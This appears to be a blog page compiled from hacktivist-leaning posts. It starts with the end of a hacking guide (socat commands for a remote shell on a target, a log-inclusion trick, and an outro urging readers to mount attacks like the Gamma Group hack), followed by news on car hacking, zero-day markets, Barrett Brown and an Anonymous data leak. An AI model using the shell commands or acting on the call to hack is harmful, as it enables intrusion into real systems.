* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

--[ 10 ]-- Outro

You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

DARPA Hackers Show How Cars Can Be Remotely Controlled

Hackers Chris Valasek and Charlie Miller have demonstrated from the backseat of a Toyota Prius that all you need is a Macbook and a USB cable in order to hack into a computer-controlled car.

Valasek is the director of security intelligence for IOActive and Miller is a security engineer for Twitter.

These two security researchers showed that they can turn off the brakes, for example, even if the driver is at the helm.

Using a grant from the Defense Advanced Research Projects Agency (DARPA), Miller and Valasek have been researching computerized car vulnerabilities since 2012 and will be displaying their findings at DEF CON, a hacker’s conference in Las Vegas next month.

Miller asserted that they “had full control of braking” and that they “disengaged the brakes so if you were going slow and tried to press the brakes they wouldn’t work. We could turn the headlamps on and off, honk the horn. We had control of many aspects of the automobile.”

• Turn off power to the steering
• Have the onboard GPS give incorrect directions
• Change the numbers on the speedometer
• Force the car to change direction

Miller explained: “At the moment there are people who are in the know, there are nay-sayers who don’t believe it’s important, and there are others saying it’s common knowledge but right now there’s not much data out there. We would love for everyone to start having a discussion about this, and for manufacturers to listen and improve the security of cars.”

Using the vehicle’s electronic control unit (ECU) and the on-board diagnostics port (OBD), Miller and Valasek gained control over a 2010 Ford Escape and Toyota Prius.

An ECU is an embedded system that “controls one or more of the electrical system or subsystems in a motor vehicle.”

The OBD is the “vehicle’s self-diagnostic and reporting” apparatus that “gives the vehicle owner or repair technician access to the status of the various vehicle sub-systems.”

A representative from Toyota explained that the hacker would have to be in the car to manipulate its systems.

He said: “Altered control can only be made when the device is connected. After it is disconnected the car functions normally. We don’t consider that to be ‘hacking’ in the sense of creating unexpected behavior, because the device must be connected – i.e. the control system of the car physically altered. The presence of a laptop or other device connected to the OBD [on board diagnostics] II port would be apparent.”

Hacking into cars that are remotely controlled, such as Google’s self-driving vehicles, is a concern, and this research could uncover implications for their security.

In 2010, teams from the University of Washington (UW) and the University of California (UC) were able to breach the computer systems of cars using cellular phone connections, Bluetooth headsets and a CD.

Stefan Savage from UC explained that their research “explores how hard it is to compromise a car’s computers without having any direct physical access to the car.”

Computerized cars “contain cellular connections and Bluetooth wireless technology” that could be tapped into remotely and used to take over the controls of the vehicle, listen into the conversations taking place in the cab of the car and completely compromise the safety of the vehicle.

Because the computer connections in cars are virtually indistinguishable from those of internet-connected computers, their propensity toward vulnerabilities from outside influences is similar.

Using an OnStar navigation unit, a hacker could utilize the same controls available to a remote technician at the company’s call center, because those technicians are fully capable of controlling a vehicle in the event of an accident or a call from a customer.

With complete disregard for driver privacy, the Obama administration gave their consent to the National Highway Traffic Safety Administration (NHTSA) to mandate black box event data recorders (EDR) be installed in all new cars in the US.

The NHTSA says that by September 2014 all car and light trucks will be equipped with EDRs that will silently “record the actions of drivers and the responses of their vehicles in a continuous information loop.”

The information recorded by EDRs includes:

• vehicle speed
• whether the brake was activated in the moments before a crash
• crash forces at the moment of impact
• information about the state of the engine throttle
• air bag deployment timing and air bag readiness prior to the crash
• whether the vehicle occupant’s seat belt was buckled

The NHTSA claims that “EDRs do not collect any personal identifying information or record conversations and do not run continuously.”

Advanced EDRs can collect detailed information about drivers and their driving habits, including the size and weight of the driver, the seat position, and the habits of the driver as well as passengers.

The excuse is the EDRs gather information about car crashes in the moments leading up to the accident that manufacturers can use to improve their safety measures when constructing vehicles. However, the government regulation utilizes surveillance technology with policies that do not outline the expressed use of the data collected in the EDRs.

Read More here.

November 21, 2012 – DCMX Radio: Anonymous on Gaza & Israel War Crimes, AT&T iPad Conviction, Blackwater CEO’s New Biz, Random Headlines, Uruguay President Charity

Anonymous statements on Gaza / Israel Conflict & Ceasefire

Security researcher Andrew Aurenheimer found guilty of conspiracy and identity fraud in ‘hackless’ AT&T iPad breach

Ex-navy SEAL & War Criminal Erik Prince sets trail for Chinese & International Investors into Africa

RANDOM QUICK HEADLINES

Uruguay President, Jose Mujica, Donates Most Of His Pay To Charity


Every Week Night 12-1am EST (9-10pm PST)


Are Aliens Real? Hacker Gary McKinnon Says Evidence is in Military Computers, US Seeks Extradition

Are aliens real? One hacker who broke into US Military computers says yes, claiming that he found evidence of extraterrestrial life in the computer networks he broke into. Now, the United States is seeking extradition for breaching both military and NASA computer networks. However, the UK says that he isn’t fit to stand trial and has blocked his extradition.

Gary McKinnon, 46, was previously a computer administrator. He hacked into military networks right after the September 11th, 2001 attacks. He says that he was looking for evidence of extraterrestrial life in those computers and that he found it. He claims he found both photographs of alien spacecraft and names of aliens who had flown them. If that is true, then the conspiracy theorists have been right all along. Aliens have landed on Earth and the United States Government is covering them up.

US officials said that he caused almost a million dollars in damage, and prosecutor Paul McNulty called it the “biggest hack of military computers ever, at least ever detected.” UK officials like Home Secretary Theresa May say that McKinnon suffers from depression and is at risk of taking his own life. British Prime Minister David Cameron is also a supporter of McKinnon, even taking the case to President Barack Obama.

So, are aliens real? Is the government covering up extraterrestrials? This is perhaps not the most credible case that involves aliens, but depression does not necessarily mean mental incompetence, and apparently Gary McKinnon was competent enough to hack into one of the most secure computer networks in the world. One thing is certain. If the conspiracy theorists are right, Gary McKinnon should be receiving a visit from the Men in Black sometime in the near future.


via Gather

October 2, 2012 – DCMX Radio: NDAA Appeals Update, Patriot Act Crushing 1st Amendment, Hacking & ZeroDays, Banking Situation

DCMX Sound Effects Update ~ Tribute to K-Rino with ‘Grand Deception’

National Detention Authorization Act (NDAA) Appeals Court Update Discussion

Viruses, Hacking, Stuxnet & Flame – ZeroDay Exploits, Who is Building Them?

Patriot Act Being Used to Silence Activism & Protest!

Romney goon offers absurd recommendation for the Banking Industry

Further Discussion of the Conspiracy Matrix


Every Week Night 12-1am EST (9-10pm PST)

Sell Out Hackers: The Zero-Day Exploit Market

Exploit sellers arm governments and businesses, but are they harming security for everyone else?

Remember the final battle scene in Star Wars: A New Hope? Remember how Luke Skywalker slotted a bomb from his X-Wing down the Death Star’s exhaust port to blow the spherical space-station apart? Well that port is much like a zero-day vulnerability, and the rebel force’s attack was a carefully constructed zero-day exploit.

Despite the Force being so strong in him, Darth Vader managed to commission a ship with a glaring flaw in it. In the same way, developers often create, and proudly deliver, software covered in holes. When they are exploited, and attackers fire malware or some other nasty code through them, owners of that software can be blown apart too.

Intelligence on such weaknesses, and the tools needed to exploit them, now sell for considerable sums. That’s because of what can be achieved with zero-days. As seen with super-virus Stuxnet, which took advantage of four zero-day flaws, weaponised vulnerabilities can have a major real-world impact. In that case, the malware disrupted Iran’s uranium enrichment project by sending centrifuges potty. It was said to have set the process back by two years.

Governments of both east and west, and large private businesses, are thought to be spending vast portions of their budgets on acquiring zero-day exploits. Meanwhile, vendors and users of their wares never learn of them. It’s bad news for Internet security, many argue.

Regardless of their quarrels, a bustling market has emerged, and it is one that has caused ruptures in the security community.

The good old days?

Yet it’s a far cry from what researchers had hoped it would become. Back in 2002, industry experts felt Internet security was in desperate need of a shot in the arm. They thought the best way to get companies and software vendors interested in improving the security of their estates was to make vulnerability hunting a more prosperous activity. They started talking openly about a more formal approach to introducing market incentives for security flaws.

Just after the turn of the Millennium, Jean Camp from Harvard University and Catherine Wolfram from Berkeley wrote a paper entitled ‘Pricing Security’. In it, they argued that the Internet and “the larger information infrastructure” was awash with easily exploitable flaws. “The only ubiquitous testing of Internet security is done by egocentric hackers,” they said.

Camp and Wolfram argued that security should be viewed as an “externality”, where if one party is hit, another can be affected either positively or negatively, but without compensation. To counter this, they suggested looking at vulnerabilities as goods, items to be bought and sold. Those who discovered vulnerabilities would effectively own them.

The researchers had a vision of a credit system, where each Internet-connected machine would be given vulnerability credits by a government body. When a machine was compromised by known flaws, the owner of the machine would relinquish their credits, or pay out in cash if they had no credits left. Those who discovered vulnerabilities, whether exploited or not, could “demand some form of payment or validation of credit ownership”. Perhaps because of the somewhat inchoate ideas put forward by Camp and Wolfram, their vision never became a reality.

At what cost?

But start-ups did emerge in the early 2000s that treated vulnerabilities as commodities. The most notable one was TippingPoint, which founded the Zero-Day Initiative (ZDI), a program that rewarded researchers for responsibly disclosing vulnerabilities, which were reported to vendors as soon as the flaw was validated. TippingPoint was subsequently bought by HP, but ZDI still operates today, as do many other bug bounty programmes, run by the likes of Google and Facebook.

They offer decent money – usually between $1,000 and $10,000 for each flaw found. Researchers get both monetary and reputational rewards, meaning they fill their pockets and bolster their CV for future consulting gigs.

Yet some believe they can and should make much more money from selling zero-days. Even back in 2002, this publication understands an iTunes vulnerability was sold for $13,000. But now much more is up for grabs.

On the one side, private firms are willing to pay significant fees because they want to gain an advantage over rivals, either by being better protected or by launching attacks themselves. On the other, governments want to buy in preparation for cyber warfare. Now they have seen the damage cyber tools can do, from Stuxnet to the super-sophisticated spy tool Flame, governments know what is at stake.

One industry insider, who preferred to remain anonymous, told TechWeekEurope a single zero-day can sell for anything between $5,000 and $500,000. Often, the higher-cost vulnerabilities can be bought as a package with the tools and services needed to exploit them, the insider added.

“It depends on the quality. They sell for what they are worth,” the source said. “The growing need, coupled with the shrinking availability and the time it takes to find and write, sets the price for exploits. It’s just basic supply and demand.”

‘Security for the one percent’

Zero-day merchants take a variety of forms. Major government contractors such as Lockheed Martin, Harris Corporation, Northrop Grumman and Raytheon are thought to be involved, but a host of specialised firms have emerged over the last decade, including Netragard, Errata Security and Vupen. It is the latter group who have been involved in a vituperative war of words with Internet activists and the more vocal members of the security industry.

The main criticism of zero-day sellers is an obvious one. By not sharing their information with the wider community, a flaw is known to a select few, often government bodies and big businesses, whilst the majority go unprotected.

This lack of what is widely known as “responsible disclosure” is what perturbs many. “It’s security for the one percent and it makes the rest of us less safe,” the Electronic Frontier Foundation said in an essay earlier this year. “These companies are basically selling burglary tools,” claims Professor Ross Anderson, of the University of Cambridge.

When Vupen decided not to tell Google about a zero-day in the Chrome browser, even though it claimed $60,000 in CanSecWest prize money for finding it, it became the bete noire of an industry that had already attracted a lot of bad publicity. Chrome users would be placed at risk, all because one company wanted to keep its handful of customers happy, onlookers moaned.

Even though he said he would only sell to NATO governments and partners, Chaouki Bekrar, CEO of Vupen, told Forbes magazine that he wouldn’t share the information with Google, even for $1 million. “We don’t want to give them any knowledge that can help them in fixing this zero-day exploit or other similar exploits. We want to keep this for our customers.”

Open source troubles?

But there may be an even more pernicious side-effect of the market’s growth. Anderson believes open source projects are now threatened by people wanting to profit from weaknesses.

Researchers are purposefully placing bugs in open source software during the development stages, so that when code appears in completed products, those same researchers can highlight the flaws and profit from them where companies are willing to pay, Anderson has told TechWeekEurope. He claimed to know of several projects where this has happened, but declined to name names.

“That’s now happening. I’ve seen it in the last four months,” Anderson said. Imagine if Linux had flaws purposefully written into it, he ponders. “Intelligence agencies would be willing to pay an extraordinary amount for zero-days for Linux.”

Those against “irresponsible” vulnerability sellers want tighter regulation. Globally, there is little restriction on the practice. Germany, which is known for having strict rules when it comes to data, is one of the only nations to have made it illegal to sell exploits. It’s even illegal there to research zero-day exploits at all.

In the UK, Anderson says he wants more controls over who UK-based zero-day merchants can sell to overseas. He doesn’t want repressive regimes using British technology to carry out mass surveillance on citizens, as has allegedly occurred in the case of Andover-based Gamma International, whose FinSpy tool has appeared tracking dissidents in Syria and Bahrain. Privacy International has threatened the UK government with legal action, if it fails to introduce tighter checks.

Fight night

Now, having been criticised ad infinitum, zero-day hunters are biting back at critics. And at journalists. Is your article going to be another piece of “troll journalism”, Vupen’s CEO asked your reporter, while this article was in progress. He declined to answer any of TechWeekEurope’s questions. Indeed, he has been wary of journalists since that infamous Forbes article.

But others are happy to speak out. When asked about the open source issue, zero-day sellers say they have heard rumours of such subterfuge, but never have they seen it.

When it comes to regulation, they believe they are, at heart, no different from coders. And there shouldn’t be laws stymying the work of coders, they argue. Those calling for legislation, they say, are just jealous, because they don’t have the skills to find the zero-days and subsequently profit from them.

“The recent industry obsession with doting on vulnerability markets is an unproductive campaign with improperly informed champions striving for idealistic, and ultimately useless, regulations,” says Aaron Portnoy, vice president of research and co-founder of Exodus Intelligence. Portnoy was one of the big-shots of the HP TippingPoint ZDI, running it for two years out of the six he was there. The rest of his five-man team is from ZDI too.

His company has a slightly different model to others, selling a feed of data on zero-days and related exploits, and promising to eventually disclose vulnerabilities to vendors for free. It finds vulnerabilities, but also pays external researchers when they hand Exodus their findings. Portnoy might run things differently to the more controversial players in the industry, but he has similarly strong views on those calling for governments to tighten their grip on the market. Security for the one percent? Nonsense, Portnoy says.

“If the ability to sell an exploit suddenly disappeared the Internet would not be a safer place, and individuals would not cease their research into discovering innovative ways to break code,” he told TechWeekEurope. “Those who believe regulation or transparency into this market seem to think otherwise, and that is likely because they themselves aren’t the ones finding the bugs.

“By fixing a single vulnerability, you protect one piece of software from one flaw… by providing enterprises and vendors insight into what attackers are capable of, you enable them to better design their defenses and hopefully develop solutions that are wider in scope.

“If people are concerned about the safety of their Internet, they should stop focusing on trying to stop curious people from being curious.”

Many exploit experts would rather see the software development industry better regulated. They believe vendors should be held more accountable when holes in their software cause harm to Internet users. That’s what Charlie Miller, one of the most noted flaw finders in the world, backs. “Exploits aren’t the problem, vulnerable programs are. Let’s make our devices unbreakable and end the discussion,” he recently tweeted.

Inner turmoil

But whilst zero-day dealers have been lashing out at critics, the market is prone to infighting too. Unlike the traditional security market, where anti-virus vendors at least ostensibly work closely with one another and willingly share threat information, exploit dealers are considerably more antagonistic.

Earlier this month, Bekrar sent a message to Netragard CEO Adriel Desautels, accusing the latter of “trolling” Vupen. “Stop promoting yourself and your s**t by trolling about us, you don’t know a s**t about us nor our customers, teenager,” read one message. “We’re a 100% research compny while u’re just another broker compny without balls to do your own 0Ds,” read another.

Desautels says the argument was over ethics. Netragard offers penetration testing services and claims to do plenty of its own research on the exploit side. It also acts as a broker of exploits, selling other researchers’ work on to the highest bidder.

The company chief tells TechWeekEurope he is far from fond of the Vupen model, in particular its unwillingness to inform vendors. “I couldn’t believe he was talking like that in public,” Desautels says. “Vupen says it won’t sell to a vendor. In my opinion that is both irresponsible and unethical. It’s unethical because if a vendor approaches you willing to pay an exclusive price for a zero-day, it’s the same thing as anyone else willing to pay for a zero-day.

“It’s irresponsible because look at who is in NATO. There are a lot of countries in NATO that don’t like each other.”

Desautels, whilst against regulation of coding, is in favour of tighter rules on brokering, even for a more dirigiste approach. Much like Anderson, he wants to see governments put stronger controls on who brokers sell to. At the same time, however, he does not believe researchers should be limited in who they can sell to.

“Legislation needs to keep its hands out of the research world because if they don’t they are going to drive it towards the black hat world and the underground. It’ll benefit the bad guys,” he adds.

“But there has to be some sort of a body that can keep brokers in check ethically… There has to be some way to control it. It will tick off a lot of the businesses that are doing it, and I understand why, because it means they won’t get easy money anymore.”

Just the beginning

In our Star Wars analogy, few people would argue that Princess Leia and the Rebel Alliance should have practised responsible disclosure and warned the Galactic Empire of the flaw in the Death Star, instead of smuggling the plans out in secret and using them for a destructive attack.

In that case moral issues came into the picture, and the issue of marketing the flaw did not arise. Perhaps that’s because there was no market at all.

Yet in the real world, the growth of the zero-day vulnerability market seems inexorable, despite the mounting criticisms of the market and the bad etiquette of certain players in it. If researchers can make more by selling to governments and private firms, they will increasingly look at that route before going to vendors.

It doesn’t look like the cost of zero-days has hit a peak either. David Maynor, CTO of Errata Security, certainly doesn’t think so. “Do you think the cost of conventional weapons has hit a peak? We have seen the most someone is willing to pay for a jet fighter?”

And it’s unlikely governments will wrap more red tape around the market. After all, why would they want to mitigate the rise of an industry of which they are the chief beneficiaries?

via TechWeekEurope

Barrett Brown – Communiqué from Prison 9/20/12

It is hard for me to express how much I appreciate your letter, which is the first I have received here, along with the support I’ve reportedly gotten from others so far. Before I forget, let me request that you also send a tweet of support to Jenna, @ElviraXMontana on Twitter; as my girlfriend, she had to watch as the FBI crushed my ribs (which I believe will be healed in time even if I’ve had trouble acquiring medical attention due to me under Geneva; put in formal request for X-ray last night here at Mansfield, whereas last week at Lew Sterrett I was sent to medic by an officer Tamer before being instead re-directed to what is intended as a temporary holding cell for those about to be released on bond, this change of plan being instigated by an officer Roeun (sic?) whom I have since reported to the proper authorities. Despite my having explained her mistake politely twice over the course of the next seven hours, and despite my condition having been serious enough to have prompted other inmates to suggest I check for internal bleeding, I was screamed at and then later simply ordered to lay down, all of which was witnessed by two other inmates, one of whom promised to inform Tim Rogers of D Magazine that I was potentially dying and needed intervention ASAP as soon as he himself was released a few minutes hence (again, this was the temporary outgoing holding cell, not meant for housing inmates for anything longer than an hour or so as their bond is processed; as such, I was not fed, either, much less given my medication, suboxone. Note that none of the treatment I received at Lew Sterrett had anything to do with who I am or what I am accused of – it is simply the natural result of the inhumane and degenerate mentality found within the Texas “corrections” system, something I first described in a 2005 article for Towards Freedom.
It is something we will have to address more firmly over the coming years, just as we have addressed North Africa and the intelligence contracting industry since late 2010. And I note all of this not merely to complain – although to complain is among the few vices I have been left aside from bragging to my fellow inmates – but to illustrate the fundamental problem that so many of us have sacrificed or risked to combat. This problem, which even Richard Nixon recognized and spoke about on that famed evening at the Lincoln Memorial, is that a republic built with the blood of giants has since become a “wild animal” – one that now feeds upon us all.
 
I try to avoid metaphors, which can illuminate but in practice are too often used to obscure. Like many aspects of language, the false metaphor kills and enslaves. And at any rate, there will be time to discuss these broader issues later. For now, I must ask you to publish this on pastebin, Anonpaste, piratepad.de, and all other available venues, and that you also send it to some of the journalists that have been kind enough to follow my work as well as the consequences thereof, particularly my friend Michael Hastings, Barry Eisler, Michael Riley (Bloomberg), Ryan Gallagher (Guardian), and Josh at Daily Caller (forgot his last name) – plus the former editor of The Yemen Times who’s now at Global Times or some such and who, along with a certain Washington Times correspondent known to Gregg Housh, plus one or two others that I know of, who are now looking into Romas/COIN due in part to my release of the NYT e-mails earlier this month. Along with others in both the mainstream and independent media, these are most likely to report accurately on this matter. Having been mischaracterized at least a hundred times by “professional” journalists since I first appeared on Fox News in January 2009 to denounce Obama’s association with the goofy fascist Rick Warren – and was introduced as being spokesman for the non-existent “American Atheist Society” rather than GAMPAC. This would be a good time to note, particularly for the benefit of certain journalists, that I am not and never have been the spokesman for Anonymous, nor its “public face” or, worse, “self-proclaimed” “face” or “spokesperson” or “leader” (as the CIA-funded Radio Free Europe called me last year when I felt compelled to “quit” the non-group that I’d never technically joined in the first place, but rather gradually attached myself to as Wikileaks and Tunisia went down in December of 2010). 
Anyone who cares to learn what happens to a person who decides to help deal with such issues at the request and with the knowledge of active Anons can search my name in conjunction with those terms, and then see the article “Barrett Brown is Anonymous” from April 2011 in which I explain clearly, as I have countless times since, that no one has the authority to designate me as such. It is known to some of those who worked out of Anonops or were otherwise particularly active in the beginning of 2011 that I wrote or edited a number of the press releases of that time, and that the al-Jazeera article written in the first few days of January and which appeared later that month under the title “Anonymous and the Global Correction” was also my work – something I revealed privately to the brilliant cyberpunk essayist Bruce Sterling after he openly speculated as to the author’s background in Wired, noting the sentiments to be that of a true revolutionary. Among those who now agree with him are the FBI, which has since responded accordingly – and unethically.
 
Contrary to the countless claims to the effect that I hold some official role in Anonymous, I can think of only one occasion in which any Anon has come close to actually deeming me as such, that being the day on which HBGary was hacked in retaliation for HBGary Federal CEO Aaron Barr’s claim – shown to be entirely false – that he had identified Anon’s “lieutenants” and “co-founder” and that he had been contacted by the FBI about this. In fact, he had conflated three different people including a professional gardener and, as shown in the notes Anon released along with the e-mails taken from HBGary Federal, had made a huge number of additional mistakes – something since confirmed by everyone concerned including Barr himself. (That the Financial Times writer who had bought Barr’s self-promotion would again essay to write about Anonymous months later, this time taking the claims of a Dutch kid at face value in the course of “reporting” various negative things about how the movement operates, is only one of numerous bizarre and depressing twists to this story; I myself would later encounter him on Canadian television as a panelist during a discussion in which he accused Anon of being particularly anti-“American interest”, to which I responded that it is difficult to avoid stepping on the empire’s toes when one assists North Africans in fighting off dictatorships that the US has supported for years.) (Oh snap!) On that day, as recorded on pastebin from the discussion on the #OPHBGary channel at Anonops, I was referred to in passing as “our public face” to a journalist.
I was on the phone to HBGary President Penny Hoglund at the time, apologizing that HBGary’s e-mails had been seized by Sabu in addition to HBGary Federal’s, instructing her on how to get on IRC in order to make her case directly to the hackers, and promising to remove the link I had put up to the 70,000 e-mails acquired in the operation, a link I had placed upon a Daily Kos post put up to explain the situation to the great many who would miss the “makeover” done to HBGary.com. Had I known that Penny was lying to me about what she and husband Greg Hoglund had known about Barr’s irresponsible attempt to save his own career at the expense of the innocent and heroic alike, I would have simply hung up. Instead, I was polite – but I recorded the call, just as I recorded the next call with Barr, the next call with HBGary exec Jim Butterworth, and finally the drunken call I received months later from Greg Hoglund himself. “Trust but verify,” as Reagan said in the context of a different set of villains.
 
With the exception of the ten minute convo I released between myself and Aaron Barr, all of the other recordings – and plenty of others – are in the possession of the FBI, which raided my apartment as well as my mother’s home on March 6th. For more on those events, as well as the criminal conspiracy to which I have been subjected by elements of the FBI, HBGary, and paid informant/contractor Jennifer Emick (among other parties both known and undiscovered), please see the last 3 videos I uploaded to my YouTube account, as well as documents I linked to on my Twitter account @BarrettBrownLOL in the final days before my most recent (and dramatic!) arrest. Not everything is released; I was interrupted by armed, mediocre federal agents and DPD officers (“No complicity in assassination of a chief executive since 1963!”) before I could finish making my case, which was to be done over several days before the entirety would be sent to the FBI and the judge who signed my March search warrant. This was to be followed by the instigation of a civil suit against HBGary and other parties to be named in the next 2 months. My plan has been disrupted – plans often are, as history tells us – but it has not been rendered obsolete. It will evolve, just as ProjectPM itself has evolved steadily since 2009, when this war became evident to me, when I first realized that my future as a political satirist would have to be abandoned in favor of this dirty, grueling struggle.
But why was I arrested this time? I would love to tell you. But the prosecution wouldn’t like that. I, and everyone else in the court room, were ordered to refrain from discussing the complaint, affidavits, and warrant, all of which are sealed at the request of the author, one FBI special agent whom I shall not name lest I give him cause for fright (or pretend fright – I am allegedly a danger to one especially skittish special agent whom I shall be careful not to name again until such time as I am prepared to list him in the civil suit I’ve been preparing for weeks now). Frankly, I do not blame this other special agent for requesting that the document be sealed – if I had written something of such low quality and demonstrable untruth, I would burn it and ask forgiveness of every deity invented by man and the higher apes/dolphins/whales. Likewise, if I were the US attorney who signed the Motion for Detention dated September 13 2012 – the document that, after having been approved by Judge Paul D. Stickney, ensured I would not only be prevented from discussing what I’m being accused of but also made a prisoner of the state until such time as a trial or some such can be concocted out of the jurisprudential magick I struggle to follow, in my innocence. Apparently I am not just a danger to the fragile FBI agents who have taken to threatening my mother and fracturing my ribs in the course of heavily-armed raids on my uptown Dallas apartment, but must be prevented from explaining to my associates, followers, and even enemies why I have again been subjected to violence and indignity.
 
I explained the first raid against me (March 6th, 6:30 a.m. CST) and the second against my mother (about six hours later) in several pastebin messages at that time. It was not until 2 months ago that I learned how a judge had been tricked into permitting this raid on me – how the disgraced contracting firm HBGary hired the paid FBI informant Jennifer Emick to, in their words, “find something to get [me] picked up on,” even as this bizarre former Anon made public accusations against me under both her real name and her adopted contractor persona: “FakeGreggHoush” on Twitter (now “AsherahResearch”) and Asherah on IRC – particularly the 2600 server where she frequented the #jester channel alongside various ex-military men and current “security” contractors who all found themselves inclined to associate with the admitted criminal hacker th3J35T3R, one of several parties who have taken credit for DoS attacks on Wikileaks. I should not have to remind anyone that 40 U.S. homes were raided in January 2011 due to a similar but less effective series of DDoS attacks on Visa, MasterCard, PayPal, and Amazon which were clearly an act of protest against an unprecedented economic blockade ordered by the U.S. regime. 14 of the “criminals” in question are being charged such that they face up to 15 years in prison. Thanks largely to Jay Leiderman the California attorney and John Penley the NYC activist and veteran, many of them are being represented for free. Likewise, I will seek and accept only pro bono assistance from this point on, though with the stipulation that I will pay any such lawyers what I can from the defense funds that have been set up for me thus far by well-wishers. As of this writing I dismiss Tom Mills, whom I retained for $3,500 after receiving bad advice from a well-meaning person.
I will also expect that money returned within 60 days of the publication of this missive online (ProjectPM participants, please ensure that he receives this message, which I have also delivered through my mother – whom he falsely claimed to be representing on the matter of the FBI threats against her despite having been paid by me, not her). And as I had noted both publicly and privately earlier this month, I am still seeking additional attorneys with skill in civil litigation to pursue at least two suits I’ll be filing by the end of the year. Those interested may write to me at my new home, Some Jail in Texas. I am able to arrange for phone conversations with any applicants (or anyone else who is either especially interesting or who is able to accept a collect call or contribute $5 to my commissary/phone fund, that being the cost of a 15-minute call instigated by me). Anyone who writes me without us having been formally introduced, I will guarantee a response if you send a self-addressed stamped envelope. Also I believe that only mail with a return address will be delivered to me, though I’m not sure.
 
I hate that I have spent so much time in conflict over the past two years, and that so much of this has involved my fellow American citizens rather than the Middle Eastern dictators that I got involved in this to combat. I feel sorrow at the lost opportunities, and as for the way it has changed me as a person… I like to think that I am wiser and less naïve than I was, but I know too well how foolish and unsophisticated I was to begin with. I cannot excuse the mistakes I myself have made on both the strategic and tactical levels in my short career. I shudder when I look back on some of the things I wrote or said when I got my first real taste of power at the dawn of 2011, and I continue to bring shame upon myself and upon my family and work by some of the things I say even lately. In particular I have made comments about the U.S. military that I do not mean and which are obviously not entirely accurate. Along with other nonsense I have said, felt, written throughout my life, many of these things originate from my own fears and weaknesses. I am humiliated at not being able to protect my own mother from the FBI, or to shield my own girlfriend from watching heavily-armed men step on my spine as I scream in pain. I cannot forget how my mom cried on March 6th after the FBI had left with my equipment and hers, and how she whispered through tears that she wanted to be able to protect me from prison but couldn’t; I will never forget the look on Jenna’s face as the federal thugs swept through my efficiency apartment with guns drawn and safeties off, in search of hidden assailants and non-existent weapons. That these things are unjust and increasingly insane does not change the fact that they are the result of my own behavior, my own miscalculations, my own choices.
 
Having said that, I regret nothing. For the last week I was denied opiates and thus forced to feel not just rage, hatred, all the primal things, but forced to endure them while sicker than most humans can imagine and in a jail that is overcrowded and filled with common criminals. I have gained something extraordinary in that process, which ended this morning when I was given the first of 30 days of suboxone. I will personally thank everyone on the outside who has helped me and this movement particularly at this critical time, when I have regained the freedom that I did nothing to lose. For now, and until that time, it is war, on paper as always, but war.
 
Barrett Brown
Founder
ProjectPM
Prisoner #35047177
Mansfield Law Enforcement Center
1601 Heritage Parkway
Mansfield, TX 76063
 
Postscript-
[redacted], if you are able to relay this message to the Anons, my ProjectPM people, journalists, etc, you will have done me a finer deed than most men ever have occasion to do for another. I am transmitting a copy of this to another individual to ensure that the FBI does not manage to silence me on this (incidentally, the local jail here in Mansfield has proven to be run by honorable, trustworthy, even friendly people, but it is nonetheless subject to the Yankee boot (no offense)). Tell journalists, etc that they may contact [redacted]. My future and that of ProjectPM depends on you and a handful of others. Thank you for your loyalty at this time. Finally, please include this PS when forwarding and ask people to see my original search warrant as published on Buzzfeed a few months back. Echelon2.org is part of the key to this affair, but not all. More to be revealed when all is prepared. Good luck to you.

Anonymous Hackers Claim To Release One Million Apple Devices’ Unique Identifiers Stolen From FBI

Anonymous has a way of releasing massive collections of information that raise many more questions than they answer.

Case in point: On Monday night, the segment of the hacker group that calls itself Antisec announced that it had dumped 1,000,001 unique device identifier numbers or UDIDs for Apple devices–the fingerprints that Apple, apps and ad networks use to identify the iPhone and iPads of individual users–that it claims to have stolen from the FBI. In a long statement posted with links to the data on the upload site Pastebin, the hackers said they had taken the Apple data from a much larger database of more than 12 million users’ personal information stored on an FBI computer.

While there’s no easy way to confirm the authenticity or the source of the released data, I downloaded the encrypted file and decrypted it, and it does seem to be an enormous list of 40-character strings made up of numbers and the letters A through F, just like Apple UDIDs. Each string is accompanied by a longer collection of characters that Anonymous says is an Apple Push Notification token and what appears to be a username and an indication as to whether the UDID is attached to an iPad, iPhone or iPod touch.

In their message, posted initially in the Anonymous twitter feed AnonymousIRC, the hackers say they used a vulnerability in Java to access the data on an FBI Dell laptop in March of this year. They say the database included not only the UDIDs, but also “user names, name of device, type of device, Apple Push Notification Service tokens, zipcodes, cellphone numbers, addresses, etc.” Anonymous claims that the amount of data about each user was highly variable, and that it only released enough data to the public “to help a significant amount of users to look if their device are listed there or not.”

The Antisec statement also took the opportunity to mock the recent appearance of NSA Director and General Keith Alexander at the hacker conference Defcon, where he made a recruiting pitch to attendees. “It was an amusing hypocritical attempt made by the system to flatter hackers into becoming tools for the state,” Anonymous’ statement reads. “We decided we’d help out Internet security by auditing FBI first.”

